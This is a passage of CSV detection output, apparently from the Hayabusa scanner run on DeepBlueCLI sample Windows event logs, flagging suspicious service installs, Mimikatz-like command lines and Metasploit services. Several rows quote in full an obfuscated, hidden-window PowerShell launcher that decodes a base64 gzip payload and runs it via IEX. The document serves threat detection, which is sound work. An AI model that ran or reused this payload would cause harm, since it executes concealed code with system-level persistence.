IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.676 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.680 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.854 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.453 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable 